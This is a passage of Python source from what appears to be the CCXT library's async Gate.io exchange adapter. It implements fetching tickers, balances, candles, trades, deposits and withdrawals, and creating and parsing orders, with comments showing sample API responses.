'percentage': percentage,
'average': None,
'baseVolume': baseVolume,
'quoteVolume': quoteVolume,
'info': ticker,
}, market, False)
async def fetch_tickers(self, symbols=None, params={}):
await self.load_markets()
type, query = self.handle_market_type_and_params('fetchTickers', None, params)
request, requestParams = self.prepare_request(None, type, query)
method = self.get_supported_mapping(type, {
'spot': 'publicSpotGetTickers',
'margin': 'publicSpotGetTickers',
'swap': 'publicFuturesGetSettleTickers',
'future': 'publicDeliveryGetSettleTickers',
})
response = await getattr(self, method)(self.extend(request, requestParams))
return self.parse_tickers(response, symbols)
def fetch_balance_helper(self, entry):
account = self.account()
account['used'] = self.safe_string_2(entry, 'freeze', 'locked')
account['free'] = self.safe_string(entry, 'available')
account['total'] = self.safe_string(entry, 'total')
return account
async def fetch_balance(self, params={}):
"""
:param dict params: exchange specific parameters
:param str params['type']: spot, margin, swap or future, if not provided self.options['defaultType'] is used
:param str params['settle']: 'btc' or 'usdt' - settle currency for perpetual swap and future - default="usdt" for swap and "btc" for future
:param str params['marginMode']: 'cross' or 'isolated' - marginMode for margin trading if not provided self.options['defaultMarginMode'] is used
:param str params['symbol']: margin only - unified ccxt symbol
"""
await self.load_markets()
symbol = self.safe_string(params, 'symbol')
params = self.omit(params, 'symbol')
type, query = self.handle_market_type_and_params('fetchBalance', None, params)
request, requestParams = self.prepare_request(None, type, query)
marginMode, requestQuery = self.get_margin_mode(False, requestParams)
if symbol is not None:
market = self.market(symbol)
request['currency_pair'] = market['id']
method = self.get_supported_mapping(type, {
'spot': self.get_supported_mapping(marginMode, {
'spot': 'privateSpotGetAccounts',
'margin': 'privateMarginGetAccounts',
'cross_margin': 'privateMarginGetCrossAccounts',
}),
'funding': 'privateMarginGetFundingAccounts',
'swap': 'privateFuturesGetSettleAccounts',
'future': 'privateDeliveryGetSettleAccounts',
})
response = await getattr(self, method)(self.extend(request, requestQuery))
contract = (type == 'swap' or type == 'future')
if contract:
response = [response]
#
# Spot / margin funding
#
# [
# {
# "currency": "DBC",
# "available": "0",
# "locked": "0"
# "lent": "0", # margin funding only
# "total_lent": "0" # margin funding only
# },
# ...
# ]
#
# Margin
#
# [
# {
# "currency_pair": "DOGE_USDT",
# "locked": False,
# "risk": "9999.99",
# "base": {
# "currency": "DOGE",
# "available": "0",
# "locked": "0",
# "borrowed": "0",
# "interest": "0"
# },
# "quote": {
# "currency": "USDT",
# "available": "0.73402",
# "locked": "0",
# "borrowed": "0",
# "interest": "0"
# }
# },
# ...
# ]
#
# Cross margin
#
# {
# "user_id": 10406147,
# "locked": False,
# "balances": {
# "USDT": {
# "available": "1",
# "freeze": "0",
# "borrowed": "0",
# "interest": "0"
# }
# },
# "total": "1",
# "borrowed": "0",
# "interest": "0",
# "risk": "9999.99"
# }
#
# Perpetual Swap
#
# {
# order_margin: "0",
# point: "0",
# bonus: "0",
# history: {
# dnw: "2.1321",
# pnl: "11.5351",
# refr: "0",
# point_fee: "0",
# fund: "-0.32340576684",
# bonus_dnw: "0",
# point_refr: "0",
# bonus_offset: "0",
# fee: "-0.20132775",
# point_dnw: "0",
# },
# unrealised_pnl: "13.315100000006",
# total: "12.51345151332",
# available: "0",
# in_dual_mode: False,
# currency: "USDT",
# position_margin: "12.51345151332",
# user: "6333333",
# }
#
# Delivery Future
#
# {
# order_margin: "0",
# point: "0",
# history: {
# dnw: "1",
# pnl: "0",
# refr: "0",
# point_fee: "0",
# point_dnw: "0",
# settle: "0",
# settle_fee: "0",
# point_refr: "0",
# fee: "0",
# },
# unrealised_pnl: "0",
# total: "1",
# available: "1",
# currency: "USDT",
# position_margin: "0",
# user: "6333333",
# }
#
result = {
'info': response,
}
crossMargin = marginMode == 'cross_margin'
margin = marginMode == 'margin'
data = response
if 'balances' in data: # True for cross_margin
flatBalances = []
balances = self.safe_value(data, 'balances', [])
# inject currency and create an artificial balance object
# so it can follow the existent flow
keys = list(balances.keys())
for i in range(0, len(keys)):
currencyId = keys[i]
content = balances[currencyId]
content['currency'] = currencyId
flatBalances.append(content)
data = flatBalances
for i in range(0, len(data)):
entry = data[i]
if margin and not crossMargin:
marketId = self.safe_string(entry, 'currency_pair')
symbol = self.safe_symbol(marketId, None, '_')
base = self.safe_value(entry, 'base', {})
quote = self.safe_value(entry, 'quote', {})
baseCode = self.safe_currency_code(self.safe_string(base, 'currency', {}))
quoteCode = self.safe_currency_code(self.safe_string(quote, 'currency', {}))
subResult = {}
subResult[baseCode] = self.fetch_balance_helper(base)
subResult[quoteCode] = self.fetch_balance_helper(quote)
result[symbol] = self.safe_balance(subResult)
else:
code = self.safe_currency_code(self.safe_string(entry, 'currency', {}))
result[code] = self.fetch_balance_helper(entry)
return result if (margin and not crossMargin) else self.safe_balance(result)
async def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
price = self.safe_string(params, 'price')
request = {}
request, params = self.prepare_request(market, None, params)
request['interval'] = self.timeframes[timeframe]
method = 'publicSpotGetCandlesticks'
if market['contract']:
maxLimit = 1999
limit = maxLimit if (limit is None) else min(limit, maxLimit)
if market['future']:
method = 'publicDeliveryGetSettleCandlesticks'
elif market['swap']:
method = 'publicFuturesGetSettleCandlesticks'
isMark = (price == 'mark')
isIndex = (price == 'index')
if isMark or isIndex:
request['contract'] = price + '_' + market['id']
params = self.omit(params, 'price')
else:
maxLimit = 1000
limit = maxLimit if (limit is None) else min(limit, maxLimit)
request['limit'] = limit
if since is not None:
duration = self.parse_timeframe(timeframe)
request['from'] = int(since / 1000)
toTimestamp = self.sum(request['from'], limit * duration - 1)
currentTimestamp = self.seconds()
request['to'] = min(toTimestamp, currentTimestamp)
response = await getattr(self, method)(self.extend(request, params))
return self.parse_ohlcvs(response, market, timeframe, since, limit)
async def fetch_mark_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
request = {
'price': 'mark',
}
return await self.fetch_ohlcv(symbol, timeframe, since, limit, self.extend(request, params))
async def fetch_funding_rate_history(self, symbol=None, since=None, limit=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchFundingRateHistory() requires a symbol argument')
await self.load_markets()
market = self.market(symbol)
if not market['swap']:
raise BadSymbol(self.id + ' fetchFundingRateHistory() supports swap contracts only')
request, query = self.prepare_request(market, None, params)
if limit is not None:
request['limit'] = limit
method = 'publicFuturesGetSettleFundingRate'
response = await getattr(self, method)(self.extend(request, query))
#
# {
# "r": "0.00063521",
# "t": "1621267200000",
# }
#
rates = []
for i in range(0, len(response)):
entry = response[i]
timestamp = self.safe_timestamp(entry, 't')
rates.append({
'info': entry,
'symbol': symbol,
'fundingRate': self.safe_number(entry, 'r'),
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
})
sorted = self.sort_by(rates, 'timestamp')
return self.filter_by_symbol_since_limit(sorted, market['symbol'], since, limit)
async def fetch_index_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
request = {
'price': 'index',
}
return await self.fetch_ohlcv(symbol, timeframe, since, limit, self.extend(request, params))
def parse_ohlcv(self, ohlcv, market=None):
#
# Spot market candles
#
# [
# "1626163200", # Unix timestamp in seconds
# "346711.933138181617", # Trading volume
# "33165.23", # Close price
# "33260", # Highest price
# "33117.6", # Lowest price
# "33184.47" # Open price
# ]
#
# Mark and Index price candles
#
# {
# "t":1632873600, # Unix timestamp in seconds
# "o": "41025", # Open price
# "h": "41882.17", # Highest price
# "c": "41776.92", # Close price
# "l": "40783.94" # Lowest price
# }
#
if isinstance(ohlcv, list):
return [
self.safe_timestamp(ohlcv, 0), # unix timestamp in seconds
self.safe_number(ohlcv, 5), # open price
self.safe_number(ohlcv, 3), # highest price
self.safe_number(ohlcv, 4), # lowest price
self.safe_number(ohlcv, 2), # close price
self.safe_number(ohlcv, 1), # trading volume
]
else:
# Mark and Index price candles
return [
self.safe_timestamp(ohlcv, 't'), # unix timestamp in seconds
self.safe_number(ohlcv, 'o'), # open price
self.safe_number(ohlcv, 'h'), # highest price
self.safe_number(ohlcv, 'l'), # lowest price
self.safe_number(ohlcv, 'c'), # close price
self.safe_number(ohlcv, 'v'), # trading volume, None for mark or index price
]
async def fetch_trades(self, symbol, since=None, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
#
# spot
#
# request = {
# 'currency_pair': market['id'],
# 'limit': limit, # maximum number of records to be returned in a single list
# 'last_id': 'id', # specify list staring point using the id of last record in previous list-query results
# 'reverse': False, # True to retrieve records where id is smaller than the specified last_id, False to retrieve records where id is larger than the specified last_id
# }
#
# swap, future
#
# request = {
# 'settle': market['settleId'],
# 'contract': market['id'],
# 'limit': limit, # maximum number of records to be returned in a single list
# 'last_id': 'id', # specify list staring point using the id of last record in previous list-query results
# 'from': since / 1000), # starting time in seconds, if not specified, to and limit will be used to limit response items
# 'to': self.seconds(), # end time in seconds, default to current time
# }
#
request, query = self.prepare_request(market, None, params)
method = self.get_supported_mapping(market['type'], {
'spot': 'publicSpotGetTrades',
'margin': 'publicSpotGetTrades',
'swap': 'publicFuturesGetSettleTrades',
'future': 'publicDeliveryGetSettleTrades',
})
if limit is not None:
request['limit'] = limit # default 100, max 1000
if since is not None and (market['contract']):
request['from'] = int(since / 1000)
response = await getattr(self, method)(self.extend(request, query))
#
# spot
#
# [
# {
# id: "1852958144",
# create_time: "1634673259",
# create_time_ms: "1634673259378.105000",
# currency_pair: "ADA_USDT",
# side: "sell",
# amount: "307.078",
# price: "2.104",
# }
# ]
#
# perpetual swap
#
# [
# {
# size: "2",
# id: "2522911",
# create_time_ms: "1634673380.182",
# create_time: "1634673380.182",
# contract: "ADA_USDT",
# price: "2.10486",
# }
# ]
#
return self.parse_trades(response, market, since, limit)
async def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
"""
Fetch personal trading history
:param str symbol: The symbol for the market to fetch trades for
:param int since: The earliest timestamp, in ms, that fetched trades were made
:param int limit: The max number of trades to fetch
:param dict params: Exchange specific parameters
:param str params['marginMode']: 'cross' or 'isolated' - marginMode for margin trading if not provided self.options['defaultMarginMode'] is used
:param str params['type']: 'spot', 'swap', or 'future', if not provided self.options['defaultMarginMode'] is used
:param int params['till']: The latest timestamp, in ms, that fetched trades were made
:param int params['page']: *spot only* Page number
:param str params['order_id']: *spot only* Filter trades with specified order ID. symbol is also required if self field is present
:param str params['order']: *contract only* Futures order ID, return related data only if specified
:param int params['offset']: *contract only* list offset, starting from 0
:param str params['last_id']: *contract only* specify list staring point using the id of last record in previous list-query results
:param int params['count_total']: *contract only* whether to return total number matched, default to 0(no return)
:returns: a list of `order structures <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
"""
await self.load_markets()
type = None
marginMode = None
request = {}
market = self.market(symbol) if (symbol is not None) else None
till = self.safe_number(params, 'till')
params = self.omit(params, 'till')
type, params = self.handle_market_type_and_params('fetchMyTrades', market, params)
contract = (type == 'swap') or (type == 'future')
if contract:
request, params = self.prepare_request(market, type, params)
else:
if market is not None:
request['currency_pair'] = market['id'] # Should always be set for non-stop
marginMode, params = self.get_margin_mode(False, params)
request['account'] = marginMode
if limit is not None:
request['limit'] = limit # default 100, max 1000
if since is not None:
request['from'] = int(since / 1000)
if till is not None:
request['to'] = int(till / 1000)
method = self.get_supported_mapping(type, {
'spot': 'privateSpotGetMyTrades',
'margin': 'privateSpotGetMyTrades',
'swap': 'privateFuturesGetSettleMyTrades',
'future': 'privateDeliveryGetSettleMyTrades',
})
response = await getattr(self, method)(self.extend(request, params))
#
# spot
#
# [
# {
# "id": "2876130500",
# "create_time": "1645464610",
# "create_time_ms": "1645464610777.399200",
# "currency_pair": "DOGE_USDT",
# "side": "sell",
# "role": "taker",
# "amount": "10.97",
# "price": "0.137384",
# "order_id": "125924049993",
# "fee": "0.00301420496",
# "fee_currency": "USDT",
# "point_fee": "0",
# "gt_fee": "0"
# }
# ]
#
# perpetual swap
#
# [
# {
# "size": -5,
# "order_id": "130264979823",
# "id": 26884791,
# "role": "taker",
# "create_time": 1645465199.5472,
# "contract": "DOGE_USDT",
# "price": "0.136888"
# }
# ]
#
# future
#
# [
# {
# "id": 121234231,
# "create_time": 1514764800.123,
# "contract": "BTC_USDT",
# "order_id": "21893289839",
# "size": 100,
# "price": "100.123",
# "role": "taker"
# }
# ]
#
return self.parse_trades(response, market, since, limit)
def parse_trade(self, trade, market=None):
#
# public
#
# {
# "id": "1334253759",
# "create_time": "1626342738",
# "create_time_ms": "1626342738331.497000",
# "currency_pair": "BTC_USDT",
# "side": "sell",
# "amount": "0.0022",
# "price": "32452.16"
# }
#
# public ws
#
# {
# id: 221994511,
# time: 1580311438.618647,
# price: '9309',
# amount: '0.0019',
# type: 'sell'
# }
#
# spot rest
#
# {
# "id": "2876130500",
# "create_time": "1645464610",
# "create_time_ms": "1645464610777.399200",
# "currency_pair": "DOGE_USDT",
# "side": "sell",
# "role": "taker",
# "amount": "10.97",
# "price": "0.137384",
# "order_id": "125924049993",
# "fee": "0.00301420496",
# "fee_currency": "USDT",
# "point_fee": "0","gt_fee":"0"
# }
#
# perpetual swap rest
#
# {
# "size": -5,
# "order_id": "130264979823",
# "id": 26884791,
# "role": "taker",
# "create_time": 1645465199.5472,
# "contract": "DOGE_USDT",
# "price": "0.136888"
# }
#
# future rest
#
# {
# "id": 121234231,
# "create_time": 1514764800.123,
# "contract": "BTC_USDT",
# "order_id": "21893289839",
# "size": 100,
# "price": "100.123",
# "role": "taker"
# }
#
id = self.safe_string(trade, 'id')
timestamp = self.safe_timestamp_2(trade, 'time', 'create_time')
timestamp = self.safe_integer(trade, 'create_time_ms', timestamp)
marketId = self.safe_string_2(trade, 'currency_pair', 'contract')
symbol = self.safe_symbol(marketId, market)
amountString = self.safe_string_2(trade, 'amount', 'size')
priceString = self.safe_string(trade, 'price')
contractSide = 'sell' if Precise.string_lt(amountString, '0') else 'buy'
amountString = Precise.string_abs(amountString)
side = self.safe_string_2(trade, 'side', 'type', contractSide)
orderId = self.safe_string(trade, 'order_id')
gtFee = self.safe_string(trade, 'gt_fee')
feeCurrency = None
feeCostString = None
if gtFee == '0':
feeCurrency = self.safe_string(trade, 'fee_currency')
feeCostString = self.safe_string(trade, 'fee')
else:
feeCurrency = 'GT'
feeCostString = gtFee
fee = {
'cost': feeCostString,
'currency': feeCurrency,
}
takerOrMaker = self.safe_string(trade, 'role')
return self.safe_trade({
'info': trade,
'id': id,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'order': orderId,
'type': None,
'side': side,
'takerOrMaker': takerOrMaker,
'price': priceString,
'amount': amountString,
'cost': None,
'fee': fee,
}, market)
async def fetch_deposits(self, code=None, since=None, limit=None, params={}):
await self.load_markets()
request = {}
currency = None
if code is not None:
currency = self.currency(code)
request['currency'] = currency['id']
if limit is not None:
request['limit'] = limit
if since is not None:
start = int(since / 1000)
request['from'] = start
request['to'] = self.sum(start, 30 * 24 * 60 * 60)
response = await self.privateWalletGetDeposits(self.extend(request, params))
return self.parse_transactions(response, currency)
async def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):
await self.load_markets()
request = {}
currency = None
if code is not None:
currency = self.currency(code)
request['currency'] = currency['id']
if limit is not None:
request['limit'] = limit
if since is not None:
start = int(since / 1000)
request['from'] = start
request['to'] = self.sum(start, 30 * 24 * 60 * 60)
response = await self.privateWalletGetWithdrawals(self.extend(request, params))
return self.parse_transactions(response, currency)
async def withdraw(self, code, amount, address, tag=None, params={}):
tag, params = self.handle_withdraw_tag_and_params(tag, params)
self.check_address(address)
await self.load_markets()
currency = self.currency(code)
request = {
'currency': currency['id'],
'address': address,
'amount': self.currency_to_precision(code, amount),
}
if tag is not None:
request['memo'] = tag
networks = self.safe_value(self.options, 'networks', {})
network = self.safe_string_upper(params, 'network') # self line allows the user to specify either ERC20 or ETH
network = self.safe_string_lower(networks, network, network) # handle ETH>ERC20 alias
if network is not None:
request['chain'] = network
params = self.omit(params, 'network')
response = await self.privateWithdrawalsPost(self.extend(request, params))
#
# {
# "id": "w13389675",
# "currency": "USDT",
# "amount": "50",
# "address": "TUu2rLFrmzUodiWfYki7QCNtv1akL682p1",
# "memo": null
# }
#
return self.parse_transaction(response, currency)
def parse_transaction_status(self, status):
statuses = {
'PEND': 'pending',
'REQUEST': 'pending',
'DMOVE': 'pending',
'CANCEL': 'failed',
'DONE': 'ok',
'BCODE': 'ok', # GateCode withdrawal
}
return self.safe_string(statuses, status, status)
def parse_transaction_type(self, type):
types = {
'd': 'deposit',
'w': 'withdrawal',
}
return self.safe_string(types, type, type)
def parse_transaction(self, transaction, currency=None):
#
# deposits
#
# {
# "id": "d33361395",
# "currency": "USDT_TRX",
# "address": "TErdnxenuLtXfnMafLbfappYdHtnXQ5U4z",
# "amount": "100",
# "txid": "ae9374de34e558562fe18cbb1bf9ab4d9eb8aa7669d65541c9fa2a532c1474a0",
# "timestamp": "1626345819",
# "status": "DONE",
# "memo": ""
# }
#
# withdraw
#
# {
# "id": "w13389675",
# "currency": "USDT",
# "amount": "50",
# "address": "TUu2rLFrmzUodiWfYki7QCNtv1akL682p1",
# "memo": null
# }
#
id = self.safe_string(transaction, 'id')
type = None
amount = self.safe_string(transaction, 'amount')
if id[0] == 'b':
# GateCode handling
type = 'deposit' if Precise.string_gt(amount, '0') else 'withdrawal'
amount = Precise.string_abs(amount)
elif id is not None:
type = self.parse_transaction_type(id[0])
currencyId = self.safe_string(transaction, 'currency')
code = self.safe_currency_code(currencyId)
txid = self.safe_string(transaction, 'txid')
rawStatus = self.safe_string(transaction, 'status')
status = self.parse_transaction_status(rawStatus)
address = self.safe_string(transaction, 'address')
fee = self.safe_number(transaction, 'fee')
tag = self.safe_string(transaction, 'memo')
if tag == '':
tag = None
timestamp = self.safe_timestamp(transaction, 'timestamp')
return {
'info': transaction,
'id': id,
'txid': txid,
'currency': code,
'amount': self.parse_number(amount),
'network': None,
'address': address,
'addressTo': None,
'addressFrom': None,
'tag': tag,
'tagTo': None,
'tagFrom': None,
'status': status,
'type': type,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'updated': None,
'fee': fee,
}
async def create_order(self, symbol, type, side, amount, price=None, params={}):
"""
Create an order on the exchange
:param str symbol: Unified CCXT market symbol
:param str type: "limit" or "market" *"market" is contract only*
:param str side: "buy" or "sell"
:param float amount: the amount of currency to trade
:param float price: *ignored in "market" orders* the price at which the order is to be fullfilled at in units of the quote currency
:param dict params: Extra parameters specific to the exchange API endpoint
:param float params['stopPrice']: The price at which a trigger order is triggered at
:param str params['timeInForce']: "GTC", "IOC", or "PO"
:param str params['marginMode']: 'cross' or 'isolated' - marginMode for margin trading if not provided self.options['defaultMarginMode'] is used
:param int params['iceberg']: Amount to display for the iceberg order, Null or 0 for normal orders, Set to -1 to hide the order completely
:param str params['text']: User defined information
:param str params['account']: *spot and margin only* "spot", "margin" or "cross_margin"
:param bool params['auto_borrow']: *margin only* Used in margin or cross margin trading to allow automatic loan of insufficient amount if balance is not enough
:param str params['settle']: *contract only* Unified Currency Code for settle currency
:param bool params['reduceOnly']: *contract only* Indicates if self order is to reduce the size of a position
:param bool params['close']: *contract only* Set as True to close the position, with size set to 0
:param bool params['auto_size']: *contract only* Set side to close dual-mode position, close_long closes the long side, while close_short the short one, size also needs to be set to 0
:returns: `An order structure <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
"""
await self.load_markets()
market = self.market(symbol)
contract = market['contract']
stopPrice = self.safe_number(params, 'stopPrice')
methodTail = 'Orders'
reduceOnly = self.safe_value_2(params, 'reduce_only', 'reduceOnly')
defaultTimeInForce = self.safe_value_2(params, 'tif', 'time_in_force', 'gtc')
timeInForce = self.safe_value(params, 'timeInForce', defaultTimeInForce)
postOnly = False
type, postOnly, timeInForce, params = self.is_post_only(type, timeInForce, None, params)
params = self.omit(params, ['stopPrice', 'reduce_only', 'reduceOnly', 'tif', 'time_in_force', 'timeInForce'])
if postOnly:
timeInForce = 'poc'
isLimitOrder = (type == 'limit')
isMarketOrder = (type == 'market')
if isLimitOrder and price is None:
raise ArgumentsRequired(self.id + ' createOrder() requires a price argument for ' + type + ' orders')
if contract:
amountToPrecision = self.amount_to_precision(symbol, amount)
signedAmount = Precise.string_neg(amountToPrecision) if (side == 'sell') else amountToPrecision
amount = int(signedAmount)
if isMarketOrder:
timeInForce = 'ioc'
price = 0
elif not isLimitOrder:
# Gateio doesn't have market orders for spot
raise InvalidOrder(self.id + ' createOrder() does not support ' + type + ' orders for ' + market['type'] + ' markets')
request = None
trigger = self.safe_value(params, 'trigger')
if stopPrice is None and trigger is None:
if contract:
# contract order
request = {
'contract': market['id'], # filled in prepareRequest above
'size': amount, # int64, positive = bid, negative = ask
# 'iceberg': 0, # int64, display size for iceberg order, 0 for non-iceberg, note that you will have to pay the taker fee for the hidden size
'price': self.price_to_precision(symbol, price), # 0 for market order with tif set as ioc
# 'close': False, # True to close the position, with size set to 0
# 'reduce_only': False, # St as True to be reduce-only order
# 'tif': 'gtc', # gtc, ioc, poc PendingOrCancelled == postOnly order
# 'text': clientOrderId, # 't-abcdef1234567890',
# 'auto_size': '', # close_long, close_short, note size also needs to be set to 0
'settle': market['settleId'], # filled in prepareRequest above
}
if reduceOnly is not None:
request['reduce_only'] = reduceOnly
if timeInForce is not None:
request['tif'] = timeInForce
else:
marginMode = None
marginMode, params = self.get_margin_mode(False, params)
# spot order
request = {
# 'text': clientOrderId, # 't-abcdef1234567890',
'currency_pair': market['id'], # filled in prepareRequest above
'type': type,
'account': marginMode, # 'spot', 'margin', 'cross_margin'
'side': side,
'amount': self.amount_to_precision(symbol, amount),
'price': self.price_to_precision(symbol, price),
# 'time_in_force': 'gtc', # gtc, ioc, poc PendingOrCancelled == postOnly order
# 'iceberg': 0, # amount to display for the iceberg order, null or 0 for normal orders, set to -1 to hide the order completely
# 'auto_borrow': False, # used in margin or cross margin trading to allow automatic loan of insufficient amount if balance is not enough
# 'auto_repay': False, # automatic repayment for automatic borrow loan generated by cross margin order, diabled by default
}
if timeInForce is not None:
request['time_in_force'] = timeInForce
clientOrderId = self.safe_string_2(params, 'text', 'clientOrderId')
if clientOrderId is not None:
# user-defined, must follow the rules if not empty
# prefixed with t-
# no longer than 28 bytes without t- prefix
# can only include 0-9, A-Z, a-z, underscores(_), hyphens(-) or dots(.)
if len(clientOrderId) > 28:
raise BadRequest(self.id + ' createOrder() clientOrderId or text param must be up to 28 characters')
params = self.omit(params, ['text', 'clientOrderId'])
if clientOrderId[0] != 't':
clientOrderId = 't-' + clientOrderId
request['text'] = clientOrderId
else:
if contract:
# contract conditional order
rule = 1 if (side == 'buy') else 2
request = {
'initial': {
'contract': market['id'],
'size': amount, # positive = buy, negative = sell, set to 0 to close the position
'price': self.price_to_precision(symbol, price), # set to 0 to use market price
# 'close': False, # set to True if trying to close the position
# 'tif': 'gtc', # gtc, ioc, if using market price, only ioc is supported
# 'text': clientOrderId, # web, api, app
# 'reduce_only': False,
},
'trigger': {
# 'strategy_type': 0, # 0 = by price, 1 = by price gap, only 0 is supported currently
# 'price_type': 0, # 0 latest deal price, 1 mark price, 2 index price
'price': self.price_to_precision(symbol, stopPrice), # price or gap
'rule': rule, # 1 means price_type >= price, 2 means price_type <= price
# 'expiration': expiration, how many seconds to wait for the condition to be triggered before cancelling the order
},
'settle': market['settleId'],
}
expiration = self.safe_integer(params, 'expiration')
if expiration is not None:
request['trigger']['expiration'] = expiration
params = self.omit(params, 'expiration')
if reduceOnly is not None:
request['initial']['reduce_only'] = reduceOnly
if timeInForce is not None:
request['initial']['tif'] = timeInForce
else:
# spot conditional order
options = self.safe_value(self.options, 'createOrder', {})
marginMode = None
marginMode, params = self.get_margin_mode(True, params)
defaultExpiration = self.safe_integer(options, 'expiration')
expiration = self.safe_integer(params, 'expiration', defaultExpiration)
rule = '>=' if (side == 'buy') else '<='
triggerPrice = self.safe_value(trigger, 'price', stopPrice)
request = {
'trigger': {
'price': self.price_to_precision(symbol, triggerPrice),
'rule': rule, # >= triggered when market price larger than or equal to price field, <= triggered when market price less than or equal to price field
'expiration': expiration, # required, how long(in seconds) to wait for the condition to be triggered before cancelling the order
},
'put': {
'type': type,
'side': side,
'price': self.price_to_precision(symbol, price),
'amount': self.amount_to_precision(symbol, amount),
'account': marginMode,
'time_in_force': timeInForce, # gtc, ioc for taker only
},
'market': market['id'],
}
methodTail = 'PriceOrders'
method = self.get_supported_mapping(market['type'], {
'spot': 'privateSpotPost' + methodTail,
'margin': 'privateSpotPost' + methodTail,
'swap': 'privateFuturesPostSettle' + methodTail,
'future': 'privateDeliveryPostSettle' + methodTail,
})
response = await getattr(self, method)(self.deep_extend(request, params))
#
# spot
#
# {
# "id": "95282841887",
# "text": "apiv4",
# "create_time": "1637383156",
# "update_time": "1637383156",
# "create_time_ms": 1637383156017,
# "update_time_ms": 1637383156017,
# "status": "open",
# "currency_pair": "ETH_USDT",
# "type": "limit",
# "account": "spot",
# "side": "buy",
# "amount": "0.01",
# "price": "3500",
# "time_in_force": "gtc",
# "iceberg": "0",
# "left": "0.01",
# "fill_price": "0",
# "filled_total": "0",
# "fee": "0",
# "fee_currency": "ETH",
# "point_fee": "0",
# "gt_fee": "0",
# "gt_discount": False,
# "rebated_fee": "0",
# "rebated_fee_currency": "USDT"
# }
#
# spot conditional
#
# {"id": 5891843}
#
# future and perpetual swaps
#
# {
# "id": 95938572327,
# "contract": "ETH_USDT",
# "mkfr": "0",
# "tkfr": "0.0005",
# "tif": "gtc",
# "is_reduce_only": False,
# "create_time": 1637384600.08,
# "price": "3000",
# "size": 1,
# "refr": "0",
# "left": 1,
# "text": "api",
# "fill_price": "0",
# "user": 2436035,
# "status": "open",
# "is_liq": False,
# "refu": 0,
# "is_close": False,
# "iceberg": 0
# }
#
# futures and perpetual swaps conditionals
#
# {"id": 7615567}
#
return self.parse_order(response, market)
def parse_order_status(self, status):
statuses = {
'_new': 'open',
'filled': 'closed',
'cancelled': 'canceled',
'liquidated': 'closed',
}
return self.safe_string(statuses, status, status)
def parse_order(self, order, market=None):
#
# SPOT
# createOrder/cancelOrder/fetchOrder
#
# {
# "id": "62364648575",
# "text": "apiv4",
# "create_time": "1626354834",
# "update_time": "1626354834",
# "create_time_ms": "1626354833544",
# "update_time_ms": "1626354833544",
# "status": "open",
# "currency_pair": "BTC_USDT",
# "type": "limit",
# "account": "spot",
# "side": "buy",
# "amount": "0.0001",
# "price": "30000",
# "time_in_force": "gtc",
# "iceberg": "0",
# "left": "0.0001",
# "fill_price": "0",
# "filled_total": "0",
# "fee": "0",
# "fee_currency": "BTC",
# "point_fee": "0",
# "gt_fee": "0",
# "gt_discount": True,
# "rebated_fee": "0",
# "rebated_fee_currency": "USDT"
# }
#
# SPOT TRIGGER ORDERS
# createOrder
#
# {
# "id": 12604556
# }
#
# fetchOrder/cancelOrder
#
# {
# "market": "ADA_USDT",
# "user": 6392049,
# "trigger": {
# "price": "1.08", # stopPrice
# "rule": "\u003e=",
# "expiration": 86400
# },
# "put": {
# "type": "limit",
# "side": "buy",
# "price": "1.08", # order price
# "amount": "1.00000000000000000000",
# "account": "normal",
# "time_in_force": "gtc"
# },
# "id": 71639298,
# "ctime": 1643945985,
# "status": "open"
# }
#
# FUTURE AND SWAP
# createOrder/cancelOrder/fetchOrder
#
# {
# "id": 123028481731,
# "contract": "ADA_USDT",
# "mkfr": "-0.00005",
# "tkfr": "0.00048",
# "tif": "ioc",
# "is_reduce_only": False,
# "create_time": 1643950262.68,
# "finish_time": 1643950262.68,
# "price": "0",
# "size": 1,
# "refr": "0",
# "left":0,
# "text": "api",
# "fill_price": "1.05273",
# "user":6329238,
# "finish_as": "filled",
# "status": "finished",
# "is_liq": False,
# "refu":0,
# "is_close": False,
# "iceberg": 0
# }
#
# TRIGGER ORDERS(FUTURE AND SWAP)
# createOrder
#
# {
# "id": 12604556
# }
#
# fetchOrder/cancelOrder
#
# {
# "user": 6320300,
# "trigger": {
# "strategy_type": 0,
# "price_type": 0,
# "price": "1.03", # stopPrice
# "rule": 2,
# "expiration": 0
# },
# "initial": {
# "contract": "ADA_USDT",
# "size": -1,
# "price": "1.02",
# "tif": "gtc",
# "text": "",
# "iceberg": 0,
# "is_close": False,
# "is_reduce_only": False,
# "auto_size": ""
# },
# "id": 126393906,
# "trade_id": 0,
# "status": "open",
# "reason": "",
# "create_time": 1643953482,
# "finish_time": 1643953482,
# "is_stop_order": False,
# "stop_trigger": {
# "rule": 0,
# "trigger_price": "",
# "order_price": ""
# },
# "me_order_id": 0,
# "order_type": ""
# }
#
put = self.safe_value_2(order, 'put', 'initial')
trigger = self.safe_value(order, 'trigger')
contract = self.safe_string(put, 'contract')
type = self.safe_string(put, 'type')
timeInForce = self.safe_string_upper_2(put, 'time_in_force', 'tif')
amount = self.safe_string_2(put, 'amount', 'size')
side = self.safe_string(put, 'side')
price = self.safe_string(put, 'price')
contract = self.safe_string(order, 'contract', contract)
type = self.safe_string(order, 'type', type)
timeInForce = self.safe_string_upper_2(order, 'time_in_force', 'tif', timeInForce)
if timeInForce == 'POC':
timeInForce = 'PO'
postOnly = (timeInForce == 'PO')
amount = self.safe_string_2(order, 'amount', 'size', amount)
side = self.safe_string(order, 'side', side)
price = self.safe_string(order, 'price', price)
remaining = self.safe_string(order, 'left')
filled = Precise.string_sub(amount, remaining)
cost = self.safe_string(order, 'filled_total')
rawStatus = None
average = None
if put:
remaining = amount
filled = '0'
cost = '0'
if contract:
isMarketOrder = Precise.string_equals(price, '0') and (timeInForce == 'IOC')
type = 'market' if isMarketOrder else 'limit'
side = 'buy' if Precise.string_gt(amount, '0') else 'sell'
rawStatus = self.safe_string(order, 'finish_as', 'open')
average = self.safe_number(order, 'fill_price')
else:
rawStatus = self.safe_string(order, 'status')
